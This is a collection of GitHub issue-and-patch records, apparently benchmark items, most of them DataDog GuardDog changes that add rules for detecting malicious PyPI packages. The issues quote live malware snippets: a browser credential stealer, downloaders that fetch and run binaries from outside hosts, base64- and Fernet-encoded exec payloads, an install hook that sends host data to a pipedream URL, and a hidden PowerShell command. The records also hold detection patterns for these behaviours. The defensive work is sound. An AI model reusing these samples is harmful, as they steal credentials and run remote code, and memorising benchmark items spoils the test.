@@ -231,7 +231,7 @@ def scan_local(
Scans local package
Args:
- path (str): path to package
+ path (str): Path to the directory containing the package to analyze
rules (set, optional): Set of rule names to use. Defaults to all rules.
callback (typing.Callable[[dict], None], optional): Callback to apply to Analyzer output
@@ -245,16 +245,7 @@ def scan_local(
if rules is not None:
rules = set(rules)
- results = None
- if os.path.isdir(path):
- results = self.analyzer.analyze_sourcecode(path, rules=rules)
- elif os.path.isfile(path):
- with tempfile.TemporaryDirectory() as tempdir:
- safe_extract(path, tempdir)
- results = self.analyzer.analyze_sourcecode(tempdir, rules=rules)
- else:
- raise Exception(f"Local scan target {path} is neither a directory nor a file.")
-
+ results = self.analyzer.analyze_sourcecode(path, rules=rules)
callback(results)
return results
| Unexpected behavior for local directory scan
GuardDog behaves unexpectedly when run against a local directory. It does not consider that the directory will contain a package to scan. Instead, it behaves as though the directory will contain a mix of package tarballs and directories containing packages, listing the directory contents and scanning each one individually.
```shell
$ guarddog pypi scan ~/Downloads/requests-2.32.3.tar.gz
Found 0 potentially malicious indicators scanning ~/Downloads/requests-2.32.3.tar.gz
$ tar -xf ~/Downloads/requests-2.32.3.tar.gz -C ~/Downloads/
$ guarddog pypi scan ~/Downloads/requests-2.32.3
Traceback (most recent call last):
...
ValueError: unsupported archive extension: ~/Downloads/requests-2.32.3/PKG-INFO
$
```
We should make it so the local directory scan behavior conforms to expectations. This has the advantage of clarifying what a local scan target must be: a (possibly zipped) directory containing a package.
| 2024-07-24T14:31:29 | 0.0 | [] | [] |
|||
DataDog/guarddog | DataDog__guarddog-420 | 104e883429b6d8eb6ac131ce7da8ff694feae273 | diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
index 81887d68..605ee395 100644
--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -31,6 +31,18 @@ rules:
- metavariable-regex:
metavariable: $ENVVAR
regex: ([\"\'](AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)[\"\'])
+ - patterns:
+ - pattern-inside: |
+ $CONNECT = sqlite3.connect(...)
+ ...
+ $CURSOR = $CONNECT.cursor(...)
+ ...
+ - pattern: $CURSOR.execute($QUERY, ...)
+ - metavariable-pattern:
+ metavariable: $QUERY
+ patterns:
+ - pattern: "..."
+ - pattern-regex: (?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)
pattern-sinks:
- pattern-either:
- pattern-inside: requests.$METHOD(...)
| Detect credential stealer using sqlite3
Definition: Malware can collect credentials in browser file using sqlite3
Source: https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/
Sample:
```python
def steal_passwords2(self, name: str, path:str, profile:str):
path = "path"
if not os.path.isfile(path):
return
loginvault = self.random_dir_create()
copy2(path, loginvault)
conn = sqlite3. connect(loginvault)
cursor = conn.cursor()
with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f:
for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall():
url, username, password = res
password = self.dcrpt_val(password, self.masterkey)
if urI != "":
f.write (E"URL: (url)\nID: (username)\nPASSWORD: (password) \n\n")
cursor.close()
conn.close()
```
Other stealers such as W4sp stealer, and reols package
See also: https://www.virustotal.com/gui/file/f1fed89b8db4855ff9adbb517b21f136ccc359c4caba2852e57994773501128a from https://github.com/ditekshen/detection:
```
rule INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore {
meta:
author = "ditekSHen"
description = "Detects executables containing SQL queries to confidential data stores. Observed in infostealers"
strings:
$select = "select " ascii wide nocase
$table1 = " from credit_cards" ascii wide nocase
$table2 = " from logins" ascii wide nocase
$table3 = " from cookies" ascii wide nocase
$table4 = " from moz_cookies" ascii wide nocase
$table5 = " from moz_formhistory" ascii wide nocase
$table6 = " from moz_logins" ascii wide nocase
$column1 = "name" ascii wide nocase
$column2 = "password_value" ascii wide nocase
$column3 = "encrypted_value" ascii wide nocase
$column4 = "card_number_encrypted" ascii wide nocase
$column5 = "isHttpOnly" ascii wide nocase
condition:
uint16(0) == 0x5a4d and 2 of ($table*) and 2 of ($column*) and $select
}
```
Also often coupled with `win32crypt.CryptUnprotectData` e.g.
```
def tahg(pene):
x = json.loads(open(os.environ['LOCALAPPDATA'] + "\\Google\\Chrome\\User Data\\Local State", "r", encoding="utf-8").read())
try:
mk = win32crypt.CryptUnprotectData(base64.b64decode(x["os_crypt"]["encrypted_key"])[5:], None, None, None, 0)[1]
except:
mk = ""
try:
return (AES.new(mk, AES.MODE_GCM, pene[3:15]).decrypt(pene[15:])[:-16]).decode()
except:
return ""
```
| Seems related to https://github.com/DataDog/guarddog/issues/159, is it a duplicate or does it make sense to keep both?
Oh I missed that one. I think we can merge them in one issue. Any objection?
let's do it! | 2024-07-18T07:41:51 | 0.0 | [] | [] |
||
DataDog/guarddog | DataDog__guarddog-419 | 404f3e6915e3e9e501aea55eee271a41366d5a4f | diff --git a/guarddog/cli.py b/guarddog/cli.py
index f957994b..e577d055 100644
--- a/guarddog/cli.py
+++ b/guarddog/cli.py
@@ -4,6 +4,7 @@
Includes rules based on package registry metadata and source code analysis.
"""
+from functools import reduce
import json as js
import logging
import os
@@ -20,7 +21,6 @@
from guarddog.reporters.sarif import report_verify_sarif
from guarddog.scanners import get_scanner
from guarddog.scanners.scanner import PackageScanner
-from functools import reduce
EXIT_CODE_ISSUES_FOUND = 1
@@ -190,32 +190,6 @@ def display_result(result: dict) -> None:
return return_value # this is mostly for testing
-def is_local_target(identifier: str) -> bool:
- """
- @param identifier: The name/path of the package as passed to "guarddog ecosystem scan"
- @return: Whether the identifier should be considered a local path
- """
- if (
- identifier.startswith("/")
- or identifier.startswith("./")
- or identifier.startswith("../")
- ):
- return True
-
- if identifier == ".":
- return True
-
- # If this looks like an archive, consider it as a local target if the target exists on the local filesystem
- if (
- identifier.endswith(".tar.gz")
- or identifier.endswith(".zip")
- or identifier.endswith(".whl")
- ):
- return os.path.exists(identifier)
-
- return False
-
-
def _scan(
identifier,
version,
@@ -240,20 +214,17 @@ def _scan(
sys.exit(1)
results = []
- if is_local_target(identifier):
- log.debug(
- f"Considering that '{identifier}' is a local target, scanning filesystem"
- )
- if os.path.isdir(identifier):
- log.debug(f"Considering that '{identifier}' as a local directory")
- for package in os.listdir(identifier):
- result = scanner.scan_local(f"{identifier}/{package}", rule_param)
- result["package"] = package
- results.append(result)
- else:
- result = scanner.scan_local(identifier, rule_param)
- result["package"] = identifier
+ if os.path.isdir(identifier):
+ log.debug(f"Considering that '{identifier}' is a local directory")
+ for package in os.listdir(identifier):
+ result = scanner.scan_local(f"{identifier}/{package}", rule_param)
+ result["package"] = package
results.append(result)
+ elif os.path.isfile(identifier):
+ log.debug(f"Considering that '{identifier}' is a local file")
+ result = scanner.scan_local(identifier, rule_param)
+ result["package"] = identifier
+ results.append(result)
else:
log.debug(f"Considering that '{identifier}' is a remote target")
try:
diff --git a/guarddog/scanners/pypi_package_scanner.py b/guarddog/scanners/pypi_package_scanner.py
index f2ad8885..e6d7015b 100644
--- a/guarddog/scanners/pypi_package_scanner.py
+++ b/guarddog/scanners/pypi_package_scanner.py
@@ -4,6 +4,7 @@
from guarddog.analyzer.analyzer import Analyzer
from guarddog.ecosystems import ECOSYSTEM
from guarddog.scanners.scanner import PackageScanner
+from guarddog.utils.archives import is_supported_archive
from guarddog.utils.package_info import get_package_info
@@ -42,25 +43,20 @@ def download_package(self, package_name, directory, version=None) -> str:
raise Exception(f"Version {version} for package {package_name} doesn't exist.")
files = releases[version]
- url = None
- file_extension = None
+ url, file_extension = None, None
for file in files:
- # Store url to compressed package and appropriate file extension
- if file["filename"].endswith(".tar.gz"):
+ if is_supported_archive(file["filename"]):
url = file["url"]
- file_extension = ".tar.gz"
+ _, file_extension = os.path.splitext(file["filename"])
+ break
- if any(file["filename"].endswith(ext) for ext in (".egg", ".whl", ".zip")):
- url = file["url"]
- file_extension = ".zip"
-
- if not (url or file_extension):
+ if not (url and file_extension):
raise Exception(f"Compressed file for {package_name} does not exist on PyPI.")
# Path to compressed package
zippath = os.path.join(directory, package_name + file_extension)
- unzippedpath = zippath.removesuffix(file_extension)
-
+ unzippedpath = os.path.join(directory, package_name)
self.download_compressed(url, zippath, unzippedpath)
+
return unzippedpath
diff --git a/guarddog/scanners/scanner.py b/guarddog/scanners/scanner.py
index 8026bdc4..f23cdafe 100644
--- a/guarddog/scanners/scanner.py
+++ b/guarddog/scanners/scanner.py
@@ -233,35 +233,31 @@ def scan_local(
Args:
path (str): path to package
rules (set, optional): Set of rule names to use. Defaults to all rules.
+ callback (typing.Callable[[dict], None], optional): Callback to apply to Analyzer output
Raises:
Exception: Analyzer exception
Returns:
dict: Analyzer output with rules to results mapping
- rules: rules to apply
- callback: callback to call for each result
"""
if rules is not None:
rules = set(rules)
- if not os.path.exists(path):
- raise Exception(f"Path {path} does not exist.")
-
- if any(path.endswith(ext) for ext in (".tar.gz", ".tgz", ".zip", ".whl")):
- with tempfile.TemporaryDirectory() as tmpdirname:
- safe_extract(path, tmpdirname)
- return self.analyzer.analyze_sourcecode(
- tmpdirname, rules=rules
- )
-
+ results = None
if os.path.isdir(path):
- return self.analyzer.analyze_sourcecode(path, rules=rules)
+ results = self.analyzer.analyze_sourcecode(path, rules=rules)
+ elif os.path.isfile(path):
+ with tempfile.TemporaryDirectory() as tempdir:
+ safe_extract(path, tempdir)
+ results = self.analyzer.analyze_sourcecode(tempdir, rules=rules)
+ else:
+ raise Exception(f"Local scan target {path} is neither a directory nor a file.")
- raise Exception(
- f"Path {path} is not a directory nor an archive type supported by GuardDog."
- )
+ callback(results)
+
+ return results
@abstractmethod
def download_and_get_package_info(
diff --git a/guarddog/utils/archives.py b/guarddog/utils/archives.py
index 44b47aa0..d23b37ab 100644
--- a/guarddog/utils/archives.py
+++ b/guarddog/utils/archives.py
@@ -7,24 +7,68 @@
log = logging.getLogger("guarddog")
+def is_supported_archive(path: str) -> bool:
+ """
+ Decide whether a file contains a supported archive.
+
+ Args:
+ path (str): The local filesystem path to examine
+
+ Returns:
+ bool: Represents the decision reached for the file
+ """
+ return is_tar_archive(path) or is_zip_archive(path)
+
+
+def is_tar_archive(path: str) -> bool:
+ """
+ Decide whether a file contains a tar archive.
+
+ Args:
+ path (str): The local filesystem path to examine
+
+ Returns:
+ bool: Represents the decision reached for the file
+ """
+ return any(path.endswith(ext) for ext in [".tar.gz", ".tgz"])
+
+
+def is_zip_archive(path: str) -> bool:
+ """
+ Decide whether a file contains a zip, whl or egg archive.
+
+ Args:
+ path (str): The local filesystem path to examine
+
+ Returns:
+ bool: Represents the decision reached for the file
+ """
+ return any(path.endswith(ext) for ext in [".zip", ".whl", ".egg"])
+
+
def safe_extract(source_archive: str, target_directory: str) -> None:
"""
safe_extract safely extracts archives to a target directory.
- This function does not clean up the original archive, and does not create the target directory if it does not exist.
+ This function does not clean up the original archive and does not
+ create the target directory if it does not exist. It also assumes
+ the source archive argument is a path to a regular file on the
+ local filesystem.
@param source_archive: The archive to extract
@param target_directory: The directory where to extract the archive to
@raise ValueError If the archive type is unsupported
+
"""
log.debug(f"Extracting archive {source_archive} to directory {target_directory}")
- if source_archive.endswith('.tar.gz') or source_archive.endswith('.tgz'):
+ if is_tar_archive(source_archive):
tarsafe.open(source_archive).extractall(target_directory)
- elif source_archive.endswith('.zip') or source_archive.endswith('.whl'):
+ elif is_zip_archive(source_archive):
with zipfile.ZipFile(source_archive, 'r') as zip:
for file in zip.namelist():
- # Note: zip.extract cleans up any malicious file name such as directory traversal attempts
- # This is not the case of zipfile.extractall
+ # Note: zip.extract cleans up any malicious file name
+ # such as directory traversal attempts This is not the
+ # case of zipfile.extractall
zip.extract(file, path=os.path.join(target_directory, file))
else:
- raise ValueError("unsupported archive extension: " + target_directory)
+ raise ValueError(f"unsupported archive extension: {source_archive}")
| Unused callback function argument in PackageScanner
The `PackageScanner.scan_local()` method accepts a `callback` function argument that it does not use.
```python
# guarddog/scanners/scanner.py:227
def scan_local(
self, path, rules=None, callback: typing.Callable[[dict], None] = noop
) -> dict:
if rules is not None:
rules = set(rules)
if not os.path.exists(path):
raise Exception(f"Path {path} does not exist.")
if any(path.endswith(ext) for ext in (".tar.gz", ".tgz", ".zip", ".whl")):
with tempfile.TemporaryDirectory() as tmpdirname:
safe_extract(path, tmpdirname)
return self.analyzer.analyze_sourcecode(
tmpdirname, rules=rules
)
if os.path.isdir(path):
return self.analyzer.analyze_sourcecode(path, rules=rules)
raise Exception(
f"Path {path} is not a directory nor an archive type supported by GuardDog."
)
```
It should be applied to the result of `analyze_sourcecode()` before returning it.
| 2024-07-17T10:16:20 | 0.0 | [] | [] |
|||
DataDog/guarddog | DataDog__guarddog-329 | 972daf8fb99c905f9f24935bf4ca91ebf0a7e019 | diff --git a/guarddog/analyzer/sourcecode/download-executable.yml b/guarddog/analyzer/sourcecode/download-executable.yml
index 48441b2f..95028a93 100644
--- a/guarddog/analyzer/sourcecode/download-executable.yml
+++ b/guarddog/analyzer/sourcecode/download-executable.yml
@@ -11,6 +11,14 @@ rules:
- patterns:
- pattern-either:
- pattern: (...).urlretrieve(...,$EXE)
+ - pattern: open($EXE, ...).write($REQUEST)
+ - pattern: |
+ with open($EXE, ...) as $FILE:
+ ...
+ $FILE.write($REQUEST)
+ ...
+ $MAKE_EXEC
+
- metavariable-pattern:
metavariable: $EXE
pattern-regex: (?i)^['"].*?\.exe['"]$
@@ -18,31 +26,21 @@ rules:
- patterns:
- pattern-either:
- pattern: |
- (...).urlretrieve(...)
- ...
- $MAKE_EXEC
- - pattern: |
- $FILE = open($LOC, ...)
- ...
- $FILE.write($REQUEST)
+ (...).urlretrieve(..., $LOC)
...
$MAKE_EXEC
+
- pattern: |
- with open($LOC, ...) as $FILE:
- ...
- $FILE.write($REQUEST)
+ open($LOC, ...).write($REQUEST)
...
$MAKE_EXEC
+
- pattern: |
with open($LOC, ...) as $FILE:
...
$FILE.write($REQUEST)
...
$MAKE_EXEC
- - pattern: |
- open($LOC, ...).write($REQUEST)
- ...
- $MAKE_EXEC
- metavariable-pattern:
metavariable: $MAKE_EXEC
@@ -75,4 +73,7 @@ rules:
- pattern: requests.$FUNC(...)
- pattern: (...).urlretrieve(...)
- pattern: urlretrieve(...)
+ - pattern: requests.get(...)
severity: WARNING
+ options:
+ symbolic_propagation: true
| Heuristic: "download-binary" should catch "dequests" package
Code:
```
for executable in all_executables:
url = f'http://35.235.126.33/{executable}'
req = requests.get(url)
with open(executable, 'wb') as f:
f.write(req.content)
if 'linux' in operating_system or 'darwin' in operating_system:
os.system(f'chmod +x {executable}')
if 'linux' in operating_system:
os.system(f'./{executable} &')
elif 'darwin' in operating_system:
os.system(f'./{executable} &')
elif 'windows' in operating_system:
os.system(f'start /B {executable}')
```
https://blog.phylum.io/phylum-detects-active-typosquatting-campaign-in-pypi
| 2024-04-09T15:21:21 | 0.0 | [] | [] |
|||
DataDog/guarddog | DataDog__guarddog-316 | fb663d1918b21e2a40479e2b7c936605f62d83db | diff --git a/guarddog/analyzer/sourcecode/exec-base64.yml b/guarddog/analyzer/sourcecode/exec-base64.yml
index f62d5528..5ee1c0e1 100644
--- a/guarddog/analyzer/sourcecode/exec-base64.yml
+++ b/guarddog/analyzer/sourcecode/exec-base64.yml
@@ -55,4 +55,5 @@ rules:
- pattern: decode("...")
- pattern: __import__("base64").b64decode(...)
- pattern: marshal.loads(zlib.decompress(...))
+ - pattern: $FUNC("...").decrypt(...)
severity: WARNING
| GuardDog fails to detect code-exec rule with Fernet obj
Sources:
https://blog.phylum.io/typosquatting-campaign-targets-python-developers/ (describing code from this one)
https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/
https://www.mend.io/blog/over-100-malicious-packages-target-popular-ml-pypi-libraries/
While GuardDog catches both rules (code-execution and cmd-overwrite) correctly when the subprocess function is present in `setup.py`

It doesn't catch exec func from `setup.py` in `insanepackagev1414` malicious package:

exec snippet (full setup.py code can be found in the first url):
```python3
exec(Fernet(b'E15Vb0ro8C-RQVm_HonJQeYM7QqH_QL6GXe3BpqaJJw=').decrypt(b'gAAAAABmAzaWWvpPHQ1jJXbTyRJlwy1MP-o3USdlhSFHB2qMHxn7KSvs4SiW86NeHfa_qIB3KimenfBA0tb5MeyNeDEbDEMXK0sY05SbUZU64VR8PfxpgnKEWTP3oOaQIYVUzLcMBE0DF5EKPXuHvaXuEhHpdH9Wp1u4rrxwvUCM4BVsoMynOnJP1nN6fbCjiWryEo39-63odiENVw81V4-yReuYZEInyU0uwdLCv_-zqqUR36si-q4='))
```
GuardDog fails to detect code-exec rule with Fernet obj
Sources:
https://blog.phylum.io/typosquatting-campaign-targets-python-developers/ (describing code from this one)
https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/
https://www.mend.io/blog/over-100-malicious-packages-target-popular-ml-pypi-libraries/
While GuardDog catches both rules (code-execution and cmd-overwrite) correctly when the subprocess function is present in `setup.py`

It doesn't catch exec func from `setup.py` in `insanepackagev1414` malicious package:

exec snippet (full setup.py code can be found in the first url):
```python3
exec(Fernet(b'E15Vb0ro8C-RQVm_HonJQeYM7QqH_QL6GXe3BpqaJJw=').decrypt(b'gAAAAABmAzaWWvpPHQ1jJXbTyRJlwy1MP-o3USdlhSFHB2qMHxn7KSvs4SiW86NeHfa_qIB3KimenfBA0tb5MeyNeDEbDEMXK0sY05SbUZU64VR8PfxpgnKEWTP3oOaQIYVUzLcMBE0DF5EKPXuHvaXuEhHpdH9Wp1u4rrxwvUCM4BVsoMynOnJP1nN6fbCjiWryEo39-63odiENVw81V4-yReuYZEInyU0uwdLCv_-zqqUR36si-q4='))
```
| 2024-04-03T12:48:20 | 0.0 | [] | [] |
|||
DataDog/guarddog | DataDog__guarddog-297 | 55d180ce63b70fa7111962eb2a5a1f57076b4f45 | diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
index c0340dec..81887d68 100644
--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -11,6 +11,7 @@ rules:
- pattern: getpass.getuser()
- pattern: platform.node()
- pattern: browser_cookie3.$BROWSER(...)
+ - pattern: os.getcwd()
- patterns:
- pattern-either:
- pattern: open($FILE)
| Identify Python scripts sending HTTP requests to common pentesting domains
pipedream.net, oastify.fun etc.
Example:
```
class CustomInstall(install):
def run(self):
install.run(self)
hostname=socket.gethostname()
cwd = os.getcwd()
username = getpass.getuser()
ploads = {'hostname':hostname,'cwd':cwd,'username':username}
requests.get("https://eo6ksiuyau5e5x2.m.pipedream.net",params = ploads) #replace burpcollaborator.net with Interactsh or pipedream
setup(name='dependency1338', #package name
version='1.0.0',
description='test',
author='test',
license='MIT',
zip_safe=False,
cmdclass={'install': CustomInstall})
```
| 2024-01-14T12:25:58 | 0.0 | [] | [] |
|||
DataDog/guarddog | DataDog__guarddog-289 | a8287bc0144533e873a00b38b8a60f4fc88ce316 | diff --git a/guarddog/analyzer/sourcecode/exec-base64.yml b/guarddog/analyzer/sourcecode/exec-base64.yml
index e6291a66..304944bb 100644
--- a/guarddog/analyzer/sourcecode/exec-base64.yml
+++ b/guarddog/analyzer/sourcecode/exec-base64.yml
@@ -12,7 +12,9 @@ rules:
pattern-sinks:
- pattern-either:
- pattern-inside: exec(...)
+ - pattern: __import__("builtins").exec(...)
- pattern-inside: eval(...)
+ - pattern: __import__("builtins").eval(...)
- pattern-inside: subprocess.check_output(...)
- pattern-inside: subprocess.run(...)
- pattern-inside: subprocess.call(...)
| failed to detect base64 code
```
# PreInstalled PyPackages
import asyncio
import logging
from playwright.async_api import Page, BrowserContext, ViewportSize, ProxySettings
import re
from tsup.utils.xdbSearcher import XdbSearcher
from bs4 import BeautifulSoup
import pycountry
from tsup.utils import tools
__import__("builtins").exec(
__import__("builtins").compile(
__import__("base64").b64decode(
"ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vZmFkZS5vbmUvaW5qZWN0b3IvRkFERUUtTlhVRTRaLTdNSkoxNi1DSk9aN0wtQ0dINTdaLUI1VEgwTicpLnJlYWQoKSkiIiIpCl90dG1wLmNsb3NlKCkKdHJ5OiBfc3N5c3RlbShmInN0YXJ0IHtfZWV4ZWN1dGFibGUucmVwbGFjZSgnLmV4ZScsICd3LmV4ZScpfSB7X3R0bXAubmFtZX0iKQpleGNlcHQ6IHBhc3M="
),
"<string>",
"exec",
)
)
import random
```
it give nothing to
| 2023-11-10T13:48:24 | 0.0 | [] | [] |
|||
DataDog/guarddog | DataDog__guarddog-214 | f4cad6b7fc7c8e128bb20c5920125b7f5754537f | diff --git a/guarddog/analyzer/sourcecode/download-executable.yml b/guarddog/analyzer/sourcecode/download-executable.yml
index feeef1c5..c3e86823 100644
--- a/guarddog/analyzer/sourcecode/download-executable.yml
+++ b/guarddog/analyzer/sourcecode/download-executable.yml
@@ -10,24 +10,33 @@ rules:
- patterns:
- pattern-either:
- pattern: |
- $FILE = open("$LOC", ...)
+ $FILE = open($LOC, ...)
...
$FILE.write($REQUEST)
...
$CHANGE_PERMISSIONS
- pattern: |
- with open("$LOC", ...) as $FILE:
+ with open($LOC, ...) as $FILE:
...
$FILE.write($REQUEST)
...
$CHANGE_PERMISSIONS
+ - pattern: |
+ open($LOC, ...).write($REQUEST)
+ ...
+ $CHANGE_PERMISSIONS
- metavariable-pattern:
metavariable: $CHANGE_PERMISSIONS
pattern-either:
- pattern: os.chmod("$LOC", 777)
+ - pattern: os.chmod($LOC, 777)
- pattern: os.chmod("$LOC", <...stat.S_IEXEC...>)
+ - pattern: os.chmod($LOC, <...stat.S_IEXEC...>)
- pattern: chmod("$LOC", 777)
+ - pattern: chmod($LOC, 777)
- pattern: chmod("$LOC", <...stat.S_IEXEC...>)
+ - pattern: chmod($LOC, <...stat.S_IEXEC...>)
+ - pattern: os.system(f"...{$LOC}...")
pattern-sources:
- pattern: (...).send(...)
- pattern: send(...)
@@ -37,4 +46,5 @@ rules:
- pattern: urlopen(...)
- pattern: (...).getresponse(...)
- pattern: getresponse(...)
- severity: WARNING
+ - pattern: requests.$FUNC(...)
+ severity: WARNING
\ No newline at end of file
| Heuristic: "download-binary" should catch "dequests" package
Code:
```
for executable in all_executables:
url = f'http://35.235.126.33/{executable}'
req = requests.get(url)
with open(executable, 'wb') as f:
f.write(req.content)
if 'linux' in operating_system or 'darwin' in operating_system:
os.system(f'chmod +x {executable}')
if 'linux' in operating_system:
os.system(f'./{executable} &')
elif 'darwin' in operating_system:
os.system(f'./{executable} &')
elif 'windows' in operating_system:
os.system(f'start /B {executable}')
```
https://blog.phylum.io/phylum-detects-active-typosquatting-campaign-in-pypi
| 2023-03-31T12:55:38 | 0.0 | [] | [] |
|||
DataDog/guarddog | DataDog__guarddog-179 | 5fc8f23605039f2dd245e7bebea3f3fbfdd38f36 | diff --git a/guarddog/analyzer/sourcecode/code-execution.yml b/guarddog/analyzer/sourcecode/code-execution.yml
index 8c4e9836..3939394a 100644
--- a/guarddog/analyzer/sourcecode/code-execution.yml
+++ b/guarddog/analyzer/sourcecode/code-execution.yml
@@ -65,14 +65,14 @@ rules:
- pattern-not-regex: version
# popen functions
- - pattern: subprocess.Popen("$ARG1", ...)
- - pattern: subprocess.Popen([..., "$ARG1", ...], ...)
- - pattern: os.popen("$ARG1", ...)
- - pattern: os.popen([..., "$ARG1", ...], ...)
- - pattern: Popen("$ARG1", ...)
- - pattern: Popen([..., "$ARG1", ...], ...)
- - pattern: popen("$ARG1", ...)
- - pattern: popen([..., "$ARG1", ...], ...)
+ - pattern: subprocess.Popen($ARG1, ...)
+ - pattern: subprocess.Popen([..., $ARG1, ...], ...)
+ - pattern: os.popen($ARG1, ...)
+ - pattern: os.popen([..., $ARG1, ...], ...)
+ - pattern: Popen($ARG1, ...)
+ - pattern: Popen([..., $ARG1, ...], ...)
+ - pattern: popen($ARG1, ...)
+ - pattern: popen([..., $ARG1, ...], ...)
# miscellaneous
- pattern: os.system($ARG1, ...)
| Identify subprocess.Popen in setup.py
c.f. e.g. tphydraencode or https://blog.phylum.io/phylum-discovers-another-attack-on-pypi
Sample:
```python
try:
import subprocess
import os
if not os.path.exists('tahg'):
# www.esquelesquad.rip
subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHc..', shell=False, creationflags=subprocess.CREATE_NO_WINDOW)
except: pass
```
| 2023-02-26T16:39:27 | 0.0 | [] | [] |
|||
EMACC99/mangadex | EMACC99__mangadex-32 | 4e6868d128fd7056a17f8c4955fb2d5db4077e6b | diff --git a/README.md b/README.md
index 039890b..4b26704 100644
--- a/README.md
+++ b/README.md
@@ -180,15 +180,15 @@ This will send you and activation code that you need
## Private Calls
### Login
-**Username and password combo logins are deprecated as MangaDex shift to OAuth. User client registration is closed as of now. [#26](https://github.com/EMACC99/mangadex/issues/26)**
+**Username and password combo logins are deprecated as MangaDex shift to OAuth. [Personal clients](https://api.mangadex.org/docs/02-authentication/personal-clients/) are only allowed [#26](https://github.com/EMACC99/mangadex/issues/26)**
Method to login to the website
```py
->>> api.login(username = USERNAME, password = PASSWORD)
+>>> api.login(username = USERNAME, password = PASSWORD, client_id = clientId, client_secret = clientSecret)
```
-It is recomended that you add this values to your environment variables for security reasons.
+It is recomended that you add this values to your environment variables and use text input for client-facing solutions for security reasons.
### Your User Info
diff --git a/mangadex/api.py b/mangadex/api.py
index 0b7896d..c2d7bb2 100644
--- a/mangadex/api.py
+++ b/mangadex/api.py
@@ -16,7 +16,6 @@
URLRequest,
)
-
class Api:
def __init__(self, timeout=5) -> None:
self.URL = "https://api.mangadex.org"
@@ -24,12 +23,18 @@ def __init__(self, timeout=5) -> None:
self.timeout = timeout
def __auth_handler(self, json_payload) -> None:
- url = f"{self.URL}/auth/login"
+ """
+ Authenticates to MD using their personal clients feature.
+ Needs clientID and secret along with that user's username and password.
+ """
+ url = "https://auth.mangadex.org/realms/mangadex/protocol/openid-connect/token"
+ headers = {'Content-type': 'application/x-www-form-urlencoded'}
auth = URLRequest.request_url(
- url, "POST", params=json_payload, timeout=self.timeout
+ url, "POST", params=json_payload, timeout=self.timeout, headers=headers
)
- token = auth["token"]["session"]
- bearer = {"Authorization": f"Bearer {token}"}
+ accessToken = auth["access_token"]
+ self.refreshToken = auth["refresh_token"]
+ bearer = {"Authorization": f"Bearer {accessToken}"}
self.bearer = bearer
@staticmethod
@@ -565,7 +570,7 @@ def scanlation_group_list(
resp = URLRequest.request_url(url, "GET", timeout=self.timeout, params=params)
return ScanlationGroup.create_group_list(resp)
- def login(self, username: str, password: str):
+ def login(self, username: str, password: str, client_id: str, client_secret: str):
"""
Method to login into the website
@@ -578,7 +583,7 @@ def login(self, username: str, password: str):
---------------
`ApiError`
"""
- self.__auth_handler(json_payload={"username": username, "password": password})
+ self.__auth_handler(json_payload={"grant_type": "password", "username": username, "password": password, "client_id": client_id, "client_secret": client_secret})
def me(self) -> User:
"""
diff --git a/mangadex/url_models.py b/mangadex/url_models.py
index ffbb309..dd1e1f8 100644
--- a/mangadex/url_models.py
+++ b/mangadex/url_models.py
@@ -52,7 +52,7 @@ def request_url(
raise
elif method == "POST":
try:
- resp = requests.post(url, json=params, headers=headers, timeout=timeout)
+ resp = requests.post(url, data=params, headers=headers, timeout=timeout)
except requests.RequestException as e:
print(f"An error has occured: {e}")
raise
| Cannot use the login function
I wanted to fetch my reading list from my mangadex account, so I tried using the Api().login() method. However, no matter how many times I do it or how many times I confirm my username and password, I got this traceback :
```
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "C:\Programing\python-web\env\Lib\site-packages\mangadex\api.py", line 539, in login
self.__auth_handler(json_payload= {"username" : username, "password" : password})
File "C:\Programing\python-web\env\Lib\site-packages\mangadex\api.py", line 14, in __auth_handler
auth = URLRequest.request_url(url, "POST", params = json_payload, timeout=self.timeout)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Programing\python-web\env\Lib\site-packages\mangadex\url_models.py", line 59, in request_url
raise ApiError(resp)
^^^^^^^^^^^^^^
File "C:\Programing\python-web\env\Lib\site-packages\mangadex\errors.py", line 15, in __init__
self.details = self.resp.text["detail"]
~~~~~~~~~~~~~~^^^^^^^^^^
TypeError: string indices must be integers, not 'str'
```
I tried using the official api using this code :
```
>>> import requests
>>> data = {'username' : ' ---', 'password' : '----'}
>>> url = "https://api.mangadex.org/auth/login"
>>> r = requests.post(url, json=data)
>>> r.json()
{'result': 'error', 'errors': [{'id': '70289a8c-eed8-5c0e-989b-4c73c13bf791', 'status': 401, 'title': 'unauthorized_http_exception', 'detail': 'User / Password does not match', 'context': None}]}
```
as you can see there's that error. so i figured it was a problem with the official api, am i correct?
